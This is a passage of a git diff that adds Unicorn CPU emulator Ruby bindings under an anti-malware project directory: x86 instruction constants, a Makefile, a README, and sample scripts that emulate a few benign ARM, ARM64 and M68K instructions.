+UC_X86_INS_VFNMADD231PS = 851 +UC_X86_INS_VFNMADDSD = 852 +UC_X86_INS_VFNMADD213SD = 853 +UC_X86_INS_VFNMADD132SD = 854 +UC_X86_INS_VFNMADD231SD = 855 +UC_X86_INS_VFNMADDSS = 856 +UC_X86_INS_VFNMADD213SS = 857 +UC_X86_INS_VFNMADD132SS = 858 +UC_X86_INS_VFNMADD231SS = 859 +UC_X86_INS_VFNMSUB132PD = 860 +UC_X86_INS_VFNMSUB132PS = 861 +UC_X86_INS_VFNMSUBPD = 862 +UC_X86_INS_VFNMSUB213PD = 863 +UC_X86_INS_VFNMSUB231PD = 864 +UC_X86_INS_VFNMSUBPS = 865 +UC_X86_INS_VFNMSUB213PS = 866 +UC_X86_INS_VFNMSUB231PS = 867 +UC_X86_INS_VFNMSUBSD = 868 +UC_X86_INS_VFNMSUB213SD = 869 +UC_X86_INS_VFNMSUB132SD = 870 +UC_X86_INS_VFNMSUB231SD = 871 +UC_X86_INS_VFNMSUBSS = 872 +UC_X86_INS_VFNMSUB213SS = 873 +UC_X86_INS_VFNMSUB132SS = 874 +UC_X86_INS_VFNMSUB231SS = 875 +UC_X86_INS_VFRCZPD = 876 +UC_X86_INS_VFRCZPS = 877 +UC_X86_INS_VFRCZSD = 878 +UC_X86_INS_VFRCZSS = 879 +UC_X86_INS_VORPD = 880 +UC_X86_INS_VORPS = 881 +UC_X86_INS_VXORPD = 882 +UC_X86_INS_VXORPS = 883 +UC_X86_INS_VGATHERDPD = 884 +UC_X86_INS_VGATHERDPS = 885 +UC_X86_INS_VGATHERPF0DPD = 886 +UC_X86_INS_VGATHERPF0DPS = 887 +UC_X86_INS_VGATHERPF0QPD = 888 +UC_X86_INS_VGATHERPF0QPS = 889 +UC_X86_INS_VGATHERPF1DPD = 890 +UC_X86_INS_VGATHERPF1DPS = 891 +UC_X86_INS_VGATHERPF1QPD = 892 +UC_X86_INS_VGATHERPF1QPS = 893 +UC_X86_INS_VGATHERQPD = 894 +UC_X86_INS_VGATHERQPS = 895 +UC_X86_INS_VHADDPD = 896 +UC_X86_INS_VHADDPS = 897 +UC_X86_INS_VHSUBPD = 898 +UC_X86_INS_VHSUBPS = 899 +UC_X86_INS_VINSERTF128 = 900 +UC_X86_INS_VINSERTF32X4 = 901 +UC_X86_INS_VINSERTF32X8 = 902 +UC_X86_INS_VINSERTF64X2 = 903 +UC_X86_INS_VINSERTF64X4 = 904 +UC_X86_INS_VINSERTI128 = 905 +UC_X86_INS_VINSERTI32X4 = 906 +UC_X86_INS_VINSERTI32X8 = 907 +UC_X86_INS_VINSERTI64X2 = 908 +UC_X86_INS_VINSERTI64X4 = 909 +UC_X86_INS_VINSERTPS = 910 +UC_X86_INS_VLDDQU = 911 +UC_X86_INS_VLDMXCSR = 912 +UC_X86_INS_VMASKMOVDQU = 913 +UC_X86_INS_VMASKMOVPD = 914 +UC_X86_INS_VMASKMOVPS = 915 +UC_X86_INS_VMAXPD = 916 +UC_X86_INS_VMAXPS = 917 +UC_X86_INS_VMAXSD = 918 
+UC_X86_INS_VMAXSS = 919 +UC_X86_INS_VMCALL = 920 +UC_X86_INS_VMCLEAR = 921 +UC_X86_INS_VMFUNC = 922 +UC_X86_INS_VMINPD = 923 +UC_X86_INS_VMINPS = 924 +UC_X86_INS_VMINSD = 925 +UC_X86_INS_VMINSS = 926 +UC_X86_INS_VMLAUNCH = 927 +UC_X86_INS_VMLOAD = 928 +UC_X86_INS_VMMCALL = 929 +UC_X86_INS_VMOVQ = 930 +UC_X86_INS_VMOVDDUP = 931 +UC_X86_INS_VMOVD = 932 +UC_X86_INS_VMOVDQA32 = 933 +UC_X86_INS_VMOVDQA64 = 934 +UC_X86_INS_VMOVDQA = 935 +UC_X86_INS_VMOVDQU16 = 936 +UC_X86_INS_VMOVDQU32 = 937 +UC_X86_INS_VMOVDQU64 = 938 +UC_X86_INS_VMOVDQU8 = 939 +UC_X86_INS_VMOVDQU = 940 +UC_X86_INS_VMOVHLPS = 941 +UC_X86_INS_VMOVHPD = 942 +UC_X86_INS_VMOVHPS = 943 +UC_X86_INS_VMOVLHPS = 944 +UC_X86_INS_VMOVLPD = 945 +UC_X86_INS_VMOVLPS = 946 +UC_X86_INS_VMOVMSKPD = 947 +UC_X86_INS_VMOVMSKPS = 948 +UC_X86_INS_VMOVNTDQA = 949 +UC_X86_INS_VMOVNTDQ = 950 +UC_X86_INS_VMOVNTPD = 951 +UC_X86_INS_VMOVNTPS = 952 +UC_X86_INS_VMOVSD = 953 +UC_X86_INS_VMOVSHDUP = 954 +UC_X86_INS_VMOVSLDUP = 955 +UC_X86_INS_VMOVSS = 956 +UC_X86_INS_VMOVUPD = 957 +UC_X86_INS_VMOVUPS = 958 +UC_X86_INS_VMPSADBW = 959 +UC_X86_INS_VMPTRLD = 960 +UC_X86_INS_VMPTRST = 961 +UC_X86_INS_VMREAD = 962 +UC_X86_INS_VMRESUME = 963 +UC_X86_INS_VMRUN = 964 +UC_X86_INS_VMSAVE = 965 +UC_X86_INS_VMULPD = 966 +UC_X86_INS_VMULPS = 967 +UC_X86_INS_VMULSD = 968 +UC_X86_INS_VMULSS = 969 +UC_X86_INS_VMWRITE = 970 +UC_X86_INS_VMXOFF = 971 +UC_X86_INS_VMXON = 972 +UC_X86_INS_VPABSB = 973 +UC_X86_INS_VPABSD = 974 +UC_X86_INS_VPABSQ = 975 +UC_X86_INS_VPABSW = 976 +UC_X86_INS_VPACKSSDW = 977 +UC_X86_INS_VPACKSSWB = 978 +UC_X86_INS_VPACKUSDW = 979 +UC_X86_INS_VPACKUSWB = 980 +UC_X86_INS_VPADDB = 981 +UC_X86_INS_VPADDD = 982 +UC_X86_INS_VPADDQ = 983 +UC_X86_INS_VPADDSB = 984 +UC_X86_INS_VPADDSW = 985 +UC_X86_INS_VPADDUSB = 986 +UC_X86_INS_VPADDUSW = 987 +UC_X86_INS_VPADDW = 988 +UC_X86_INS_VPALIGNR = 989 +UC_X86_INS_VPANDD = 990 +UC_X86_INS_VPANDND = 991 +UC_X86_INS_VPANDNQ = 992 +UC_X86_INS_VPANDN = 993 +UC_X86_INS_VPANDQ = 994 +UC_X86_INS_VPAND 
= 995 +UC_X86_INS_VPAVGB = 996 +UC_X86_INS_VPAVGW = 997 +UC_X86_INS_VPBLENDD = 998 +UC_X86_INS_VPBLENDMB = 999 +UC_X86_INS_VPBLENDMD = 1000 +UC_X86_INS_VPBLENDMQ = 1001 +UC_X86_INS_VPBLENDMW = 1002 +UC_X86_INS_VPBLENDVB = 1003 +UC_X86_INS_VPBLENDW = 1004 +UC_X86_INS_VPBROADCASTB = 1005 +UC_X86_INS_VPBROADCASTD = 1006 +UC_X86_INS_VPBROADCASTMB2Q = 1007 +UC_X86_INS_VPBROADCASTMW2D = 1008 +UC_X86_INS_VPBROADCASTQ = 1009 +UC_X86_INS_VPBROADCASTW = 1010 +UC_X86_INS_VPCLMULQDQ = 1011 +UC_X86_INS_VPCMOV = 1012 +UC_X86_INS_VPCMPB = 1013 +UC_X86_INS_VPCMPD = 1014 +UC_X86_INS_VPCMPEQB = 1015 +UC_X86_INS_VPCMPEQD = 1016 +UC_X86_INS_VPCMPEQQ = 1017 +UC_X86_INS_VPCMPEQW = 1018 +UC_X86_INS_VPCMPESTRI = 1019 +UC_X86_INS_VPCMPESTRM = 1020 +UC_X86_INS_VPCMPGTB = 1021 +UC_X86_INS_VPCMPGTD = 1022 +UC_X86_INS_VPCMPGTQ = 1023 +UC_X86_INS_VPCMPGTW = 1024 +UC_X86_INS_VPCMPISTRI = 1025 +UC_X86_INS_VPCMPISTRM = 1026 +UC_X86_INS_VPCMPQ = 1027 +UC_X86_INS_VPCMPUB = 1028 +UC_X86_INS_VPCMPUD = 1029 +UC_X86_INS_VPCMPUQ = 1030 +UC_X86_INS_VPCMPUW = 1031 +UC_X86_INS_VPCMPW = 1032 +UC_X86_INS_VPCOMB = 1033 +UC_X86_INS_VPCOMD = 1034 +UC_X86_INS_VPCOMPRESSD = 1035 +UC_X86_INS_VPCOMPRESSQ = 1036 +UC_X86_INS_VPCOMQ = 1037 +UC_X86_INS_VPCOMUB = 1038 +UC_X86_INS_VPCOMUD = 1039 +UC_X86_INS_VPCOMUQ = 1040 +UC_X86_INS_VPCOMUW = 1041 +UC_X86_INS_VPCOMW = 1042 +UC_X86_INS_VPCONFLICTD = 1043 +UC_X86_INS_VPCONFLICTQ = 1044 +UC_X86_INS_VPERM2F128 = 1045 +UC_X86_INS_VPERM2I128 = 1046 +UC_X86_INS_VPERMD = 1047 +UC_X86_INS_VPERMI2D = 1048 +UC_X86_INS_VPERMI2PD = 1049 +UC_X86_INS_VPERMI2PS = 1050 +UC_X86_INS_VPERMI2Q = 1051 +UC_X86_INS_VPERMIL2PD = 1052 +UC_X86_INS_VPERMIL2PS = 1053 +UC_X86_INS_VPERMILPD = 1054 +UC_X86_INS_VPERMILPS = 1055 +UC_X86_INS_VPERMPD = 1056 +UC_X86_INS_VPERMPS = 1057 +UC_X86_INS_VPERMQ = 1058 +UC_X86_INS_VPERMT2D = 1059 +UC_X86_INS_VPERMT2PD = 1060 +UC_X86_INS_VPERMT2PS = 1061 +UC_X86_INS_VPERMT2Q = 1062 +UC_X86_INS_VPEXPANDD = 1063 +UC_X86_INS_VPEXPANDQ = 1064 +UC_X86_INS_VPEXTRB = 1065 
+UC_X86_INS_VPEXTRD = 1066 +UC_X86_INS_VPEXTRQ = 1067 +UC_X86_INS_VPEXTRW = 1068 +UC_X86_INS_VPGATHERDD = 1069 +UC_X86_INS_VPGATHERDQ = 1070 +UC_X86_INS_VPGATHERQD = 1071 +UC_X86_INS_VPGATHERQQ = 1072 +UC_X86_INS_VPHADDBD = 1073 +UC_X86_INS_VPHADDBQ = 1074 +UC_X86_INS_VPHADDBW = 1075 +UC_X86_INS_VPHADDDQ = 1076 +UC_X86_INS_VPHADDD = 1077 +UC_X86_INS_VPHADDSW = 1078 +UC_X86_INS_VPHADDUBD = 1079 +UC_X86_INS_VPHADDUBQ = 1080 +UC_X86_INS_VPHADDUBW = 1081 +UC_X86_INS_VPHADDUDQ = 1082 +UC_X86_INS_VPHADDUWD = 1083 +UC_X86_INS_VPHADDUWQ = 1084 +UC_X86_INS_VPHADDWD = 1085 +UC_X86_INS_VPHADDWQ = 1086 +UC_X86_INS_VPHADDW = 1087 +UC_X86_INS_VPHMINPOSUW = 1088 +UC_X86_INS_VPHSUBBW = 1089 +UC_X86_INS_VPHSUBDQ = 1090 +UC_X86_INS_VPHSUBD = 1091 +UC_X86_INS_VPHSUBSW = 1092 +UC_X86_INS_VPHSUBWD = 1093 +UC_X86_INS_VPHSUBW = 1094 +UC_X86_INS_VPINSRB = 1095 +UC_X86_INS_VPINSRD = 1096 +UC_X86_INS_VPINSRQ = 1097 +UC_X86_INS_VPINSRW = 1098 +UC_X86_INS_VPLZCNTD = 1099 +UC_X86_INS_VPLZCNTQ = 1100 +UC_X86_INS_VPMACSDD = 1101 +UC_X86_INS_VPMACSDQH = 1102 +UC_X86_INS_VPMACSDQL = 1103 +UC_X86_INS_VPMACSSDD = 1104 +UC_X86_INS_VPMACSSDQH = 1105 +UC_X86_INS_VPMACSSDQL = 1106 +UC_X86_INS_VPMACSSWD = 1107 +UC_X86_INS_VPMACSSWW = 1108 +UC_X86_INS_VPMACSWD = 1109 +UC_X86_INS_VPMACSWW = 1110 +UC_X86_INS_VPMADCSSWD = 1111 +UC_X86_INS_VPMADCSWD = 1112 +UC_X86_INS_VPMADDUBSW = 1113 +UC_X86_INS_VPMADDWD = 1114 +UC_X86_INS_VPMASKMOVD = 1115 +UC_X86_INS_VPMASKMOVQ = 1116 +UC_X86_INS_VPMAXSB = 1117 +UC_X86_INS_VPMAXSD = 1118 +UC_X86_INS_VPMAXSQ = 1119 +UC_X86_INS_VPMAXSW = 1120 +UC_X86_INS_VPMAXUB = 1121 +UC_X86_INS_VPMAXUD = 1122 +UC_X86_INS_VPMAXUQ = 1123 +UC_X86_INS_VPMAXUW = 1124 +UC_X86_INS_VPMINSB = 1125 +UC_X86_INS_VPMINSD = 1126 +UC_X86_INS_VPMINSQ = 1127 +UC_X86_INS_VPMINSW = 1128 +UC_X86_INS_VPMINUB = 1129 +UC_X86_INS_VPMINUD = 1130 +UC_X86_INS_VPMINUQ = 1131 +UC_X86_INS_VPMINUW = 1132 +UC_X86_INS_VPMOVDB = 1133 +UC_X86_INS_VPMOVDW = 1134 +UC_X86_INS_VPMOVM2B = 1135 +UC_X86_INS_VPMOVM2D = 1136 
+UC_X86_INS_VPMOVM2Q = 1137 +UC_X86_INS_VPMOVM2W = 1138 +UC_X86_INS_VPMOVMSKB = 1139 +UC_X86_INS_VPMOVQB = 1140 +UC_X86_INS_VPMOVQD = 1141 +UC_X86_INS_VPMOVQW = 1142 +UC_X86_INS_VPMOVSDB = 1143 +UC_X86_INS_VPMOVSDW = 1144 +UC_X86_INS_VPMOVSQB = 1145 +UC_X86_INS_VPMOVSQD = 1146 +UC_X86_INS_VPMOVSQW = 1147 +UC_X86_INS_VPMOVSXBD = 1148 +UC_X86_INS_VPMOVSXBQ = 1149 +UC_X86_INS_VPMOVSXBW = 1150 +UC_X86_INS_VPMOVSXDQ = 1151 +UC_X86_INS_VPMOVSXWD = 1152 +UC_X86_INS_VPMOVSXWQ = 1153 +UC_X86_INS_VPMOVUSDB = 1154 +UC_X86_INS_VPMOVUSDW = 1155 +UC_X86_INS_VPMOVUSQB = 1156 +UC_X86_INS_VPMOVUSQD = 1157 +UC_X86_INS_VPMOVUSQW = 1158 +UC_X86_INS_VPMOVZXBD = 1159 +UC_X86_INS_VPMOVZXBQ = 1160 +UC_X86_INS_VPMOVZXBW = 1161 +UC_X86_INS_VPMOVZXDQ = 1162 +UC_X86_INS_VPMOVZXWD = 1163 +UC_X86_INS_VPMOVZXWQ = 1164 +UC_X86_INS_VPMULDQ = 1165 +UC_X86_INS_VPMULHRSW = 1166 +UC_X86_INS_VPMULHUW = 1167 +UC_X86_INS_VPMULHW = 1168 +UC_X86_INS_VPMULLD = 1169 +UC_X86_INS_VPMULLQ = 1170 +UC_X86_INS_VPMULLW = 1171 +UC_X86_INS_VPMULUDQ = 1172 +UC_X86_INS_VPORD = 1173 +UC_X86_INS_VPORQ = 1174 +UC_X86_INS_VPOR = 1175 +UC_X86_INS_VPPERM = 1176 +UC_X86_INS_VPROTB = 1177 +UC_X86_INS_VPROTD = 1178 +UC_X86_INS_VPROTQ = 1179 +UC_X86_INS_VPROTW = 1180 +UC_X86_INS_VPSADBW = 1181 +UC_X86_INS_VPSCATTERDD = 1182 +UC_X86_INS_VPSCATTERDQ = 1183 +UC_X86_INS_VPSCATTERQD = 1184 +UC_X86_INS_VPSCATTERQQ = 1185 +UC_X86_INS_VPSHAB = 1186 +UC_X86_INS_VPSHAD = 1187 +UC_X86_INS_VPSHAQ = 1188 +UC_X86_INS_VPSHAW = 1189 +UC_X86_INS_VPSHLB = 1190 +UC_X86_INS_VPSHLD = 1191 +UC_X86_INS_VPSHLQ = 1192 +UC_X86_INS_VPSHLW = 1193 +UC_X86_INS_VPSHUFB = 1194 +UC_X86_INS_VPSHUFD = 1195 +UC_X86_INS_VPSHUFHW = 1196 +UC_X86_INS_VPSHUFLW = 1197 +UC_X86_INS_VPSIGNB = 1198 +UC_X86_INS_VPSIGND = 1199 +UC_X86_INS_VPSIGNW = 1200 +UC_X86_INS_VPSLLDQ = 1201 +UC_X86_INS_VPSLLD = 1202 +UC_X86_INS_VPSLLQ = 1203 +UC_X86_INS_VPSLLVD = 1204 +UC_X86_INS_VPSLLVQ = 1205 +UC_X86_INS_VPSLLW = 1206 +UC_X86_INS_VPSRAD = 1207 +UC_X86_INS_VPSRAQ = 1208 
+UC_X86_INS_VPSRAVD = 1209 +UC_X86_INS_VPSRAVQ = 1210 +UC_X86_INS_VPSRAW = 1211 +UC_X86_INS_VPSRLDQ = 1212 +UC_X86_INS_VPSRLD = 1213 +UC_X86_INS_VPSRLQ = 1214 +UC_X86_INS_VPSRLVD = 1215 +UC_X86_INS_VPSRLVQ = 1216 +UC_X86_INS_VPSRLW = 1217 +UC_X86_INS_VPSUBB = 1218 +UC_X86_INS_VPSUBD = 1219 +UC_X86_INS_VPSUBQ = 1220 +UC_X86_INS_VPSUBSB = 1221 +UC_X86_INS_VPSUBSW = 1222 +UC_X86_INS_VPSUBUSB = 1223 +UC_X86_INS_VPSUBUSW = 1224 +UC_X86_INS_VPSUBW = 1225 +UC_X86_INS_VPTESTMD = 1226 +UC_X86_INS_VPTESTMQ = 1227 +UC_X86_INS_VPTESTNMD = 1228 +UC_X86_INS_VPTESTNMQ = 1229 +UC_X86_INS_VPTEST = 1230 +UC_X86_INS_VPUNPCKHBW = 1231 +UC_X86_INS_VPUNPCKHDQ = 1232 +UC_X86_INS_VPUNPCKHQDQ = 1233 +UC_X86_INS_VPUNPCKHWD = 1234 +UC_X86_INS_VPUNPCKLBW = 1235 +UC_X86_INS_VPUNPCKLDQ = 1236 +UC_X86_INS_VPUNPCKLQDQ = 1237 +UC_X86_INS_VPUNPCKLWD = 1238 +UC_X86_INS_VPXORD = 1239 +UC_X86_INS_VPXORQ = 1240 +UC_X86_INS_VPXOR = 1241 +UC_X86_INS_VRCP14PD = 1242 +UC_X86_INS_VRCP14PS = 1243 +UC_X86_INS_VRCP14SD = 1244 +UC_X86_INS_VRCP14SS = 1245 +UC_X86_INS_VRCP28PD = 1246 +UC_X86_INS_VRCP28PS = 1247 +UC_X86_INS_VRCP28SD = 1248 +UC_X86_INS_VRCP28SS = 1249 +UC_X86_INS_VRCPPS = 1250 +UC_X86_INS_VRCPSS = 1251 +UC_X86_INS_VRNDSCALEPD = 1252 +UC_X86_INS_VRNDSCALEPS = 1253 +UC_X86_INS_VRNDSCALESD = 1254 +UC_X86_INS_VRNDSCALESS = 1255 +UC_X86_INS_VROUNDPD = 1256 +UC_X86_INS_VROUNDPS = 1257 +UC_X86_INS_VROUNDSD = 1258 +UC_X86_INS_VROUNDSS = 1259 +UC_X86_INS_VRSQRT14PD = 1260 +UC_X86_INS_VRSQRT14PS = 1261 +UC_X86_INS_VRSQRT14SD = 1262 +UC_X86_INS_VRSQRT14SS = 1263 +UC_X86_INS_VRSQRT28PD = 1264 +UC_X86_INS_VRSQRT28PS = 1265 +UC_X86_INS_VRSQRT28SD = 1266 +UC_X86_INS_VRSQRT28SS = 1267 +UC_X86_INS_VRSQRTPS = 1268 +UC_X86_INS_VRSQRTSS = 1269 +UC_X86_INS_VSCATTERDPD = 1270 +UC_X86_INS_VSCATTERDPS = 1271 +UC_X86_INS_VSCATTERPF0DPD = 1272 +UC_X86_INS_VSCATTERPF0DPS = 1273 +UC_X86_INS_VSCATTERPF0QPD = 1274 +UC_X86_INS_VSCATTERPF0QPS = 1275 +UC_X86_INS_VSCATTERPF1DPD = 1276 +UC_X86_INS_VSCATTERPF1DPS = 1277 
+UC_X86_INS_VSCATTERPF1QPD = 1278 +UC_X86_INS_VSCATTERPF1QPS = 1279 +UC_X86_INS_VSCATTERQPD = 1280 +UC_X86_INS_VSCATTERQPS = 1281 +UC_X86_INS_VSHUFPD = 1282 +UC_X86_INS_VSHUFPS = 1283 +UC_X86_INS_VSQRTPD = 1284 +UC_X86_INS_VSQRTPS = 1285 +UC_X86_INS_VSQRTSD = 1286 +UC_X86_INS_VSQRTSS = 1287 +UC_X86_INS_VSTMXCSR = 1288 +UC_X86_INS_VSUBPD = 1289 +UC_X86_INS_VSUBPS = 1290 +UC_X86_INS_VSUBSD = 1291 +UC_X86_INS_VSUBSS = 1292 +UC_X86_INS_VTESTPD = 1293 +UC_X86_INS_VTESTPS = 1294 +UC_X86_INS_VUNPCKHPD = 1295 +UC_X86_INS_VUNPCKHPS = 1296 +UC_X86_INS_VUNPCKLPD = 1297 +UC_X86_INS_VUNPCKLPS = 1298 +UC_X86_INS_VZEROALL = 1299 +UC_X86_INS_VZEROUPPER = 1300 +UC_X86_INS_WAIT = 1301 +UC_X86_INS_WBINVD = 1302 +UC_X86_INS_WRFSBASE = 1303 +UC_X86_INS_WRGSBASE = 1304 +UC_X86_INS_WRMSR = 1305 +UC_X86_INS_XABORT = 1306 +UC_X86_INS_XACQUIRE = 1307 +UC_X86_INS_XBEGIN = 1308 +UC_X86_INS_XCHG = 1309 +UC_X86_INS_XCRYPTCBC = 1310 +UC_X86_INS_XCRYPTCFB = 1311 +UC_X86_INS_XCRYPTCTR = 1312 +UC_X86_INS_XCRYPTECB = 1313 +UC_X86_INS_XCRYPTOFB = 1314 +UC_X86_INS_XEND = 1315 +UC_X86_INS_XGETBV = 1316 +UC_X86_INS_XLATB = 1317 +UC_X86_INS_XRELEASE = 1318 +UC_X86_INS_XRSTOR = 1319 +UC_X86_INS_XRSTOR64 = 1320 +UC_X86_INS_XRSTORS = 1321 +UC_X86_INS_XRSTORS64 = 1322 +UC_X86_INS_XSAVE = 1323 +UC_X86_INS_XSAVE64 = 1324 +UC_X86_INS_XSAVEC = 1325 +UC_X86_INS_XSAVEC64 = 1326 +UC_X86_INS_XSAVEOPT = 1327 +UC_X86_INS_XSAVEOPT64 = 1328 +UC_X86_INS_XSAVES = 1329 +UC_X86_INS_XSAVES64 = 1330 +UC_X86_INS_XSETBV = 1331 +UC_X86_INS_XSHA1 = 1332 +UC_X86_INS_XSHA256 = 1333 +UC_X86_INS_XSTORE = 1334 +UC_X86_INS_XTEST = 1335 +UC_X86_INS_FDISI8087_NOP = 1336 +UC_X86_INS_FENI8087_NOP = 1337 +UC_X86_INS_ENDING = 1338 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/Makefile new file mode 100644 index 0000000..9d52de9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/Makefile @@ -0,0 +1,11 @@ +# Ruby binding for Unicorn 
engine. Sascha Schirra <sashs@scoding.de> + +.PHONY: gen_const + +# Use bundle install && rake to install gem and test +install: gen_const + cd unicorn_gem && rake build + cd unicorn_gem && gem install --local pkg/unicorn-engine-1.0.1.gem + +gen_const: + cd .. && python const_generator.py ruby diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/README.md new file mode 100644 index 0000000..67a2109 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/README.md @@ -0,0 +1,24 @@ +# Installation + +## Software requirements + +### Linux +- ruby >= 1.9.3 +- rubygems +- make +- gcc + +### Mac OS +- ruby >= 1.9.3 +- rubygems +- make +- XCode + +## Install unicorn + * cd path_to_unicorn + * ./make.sh install + +## Install ruby binding + * cd bindings/ruby + * make install + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm.rb new file mode 100644 index 0000000..f9f8c1e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm.rb @@ -0,0 +1,106 @@ +#!/usr/bin/env ruby + +require 'unicorn_engine' +require 'unicorn_engine/arm_const' + +include UnicornEngine + +# code to be emulated +ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = "\x83\xb0" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# Test ARM +def test_arm() + puts("Emulate ARM code") + begin + # Initialize emulator in ARM mode + mu = 
Uc.new UC_ARCH_ARM, UC_MODE_ARM + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + ARM_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + puts(">>> R0 = 0x%x" % r0) + puts(">>> R1 = 0x%x" % r1) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_thumb() + puts("Emulate THUMB code") + begin + # Initialize emulator in thumb mode + mu = Uc.new UC_ARCH_ARM, UC_MODE_THUMB + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. 
Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + puts(">>> SP = 0x%x" % sp) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_arm() +puts("=" * 20) +test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm64.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm64.rb new file mode 100644 index 0000000..37d9511 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm64.rb @@ -0,0 +1,69 @@ +#!/usr/bin/env ruby +# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> +require 'unicorn_engine' +require 'unicorn_engine/arm64_const' + +include UnicornEngine + +# code to be emulated +ARM64_CODE = "\xab\x01\x0f\x8b" #add x11, x13, x15 + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# Test ARM64 +def test_arm64() + puts("Emulate ARM64 code") + begin + # Initialize emulator in ARM mode + mu = Uc.new UC_ARCH_ARM64, UC_MODE_ARM + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM64_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM64_REG_X11, 0x1234) + mu.reg_write(UC_ARM64_REG_X13, 0x6789) + mu.reg_write(UC_ARM64_REG_X15, 0x3333) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + 
ARM64_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + x11 = mu.reg_read(UC_ARM64_REG_X11) + x13 = mu.reg_read(UC_ARM64_REG_X13) + x15 = mu.reg_read(UC_ARM64_REG_X15) + puts(">>> X11 = 0x%x" % x11) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_arm64() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_m68k.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_m68k.rb new file mode 100644 index 0000000..fc2522c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_m68k.rb @@ -0,0 +1,65 @@ +#!/usr/bin/env ruby +# Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> + +require 'unicorn_engine' +require 'unicorn_engine/m68k_const' + +include UnicornEngine + +# code to be emulated +M68K_CODE = "\x76\xed" # movq #-19, %d3 +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# Test m68k +def test_m68k() + puts("Emulate M68K code") + begin + # Initialize emulator in m68k mode + mu = Uc.new UC_ARCH_M68K, UC_MODE_BIG_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, M68K_CODE) + + # initialize machine registers + mu.reg_write(UC_M68K_REG_D3, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite 
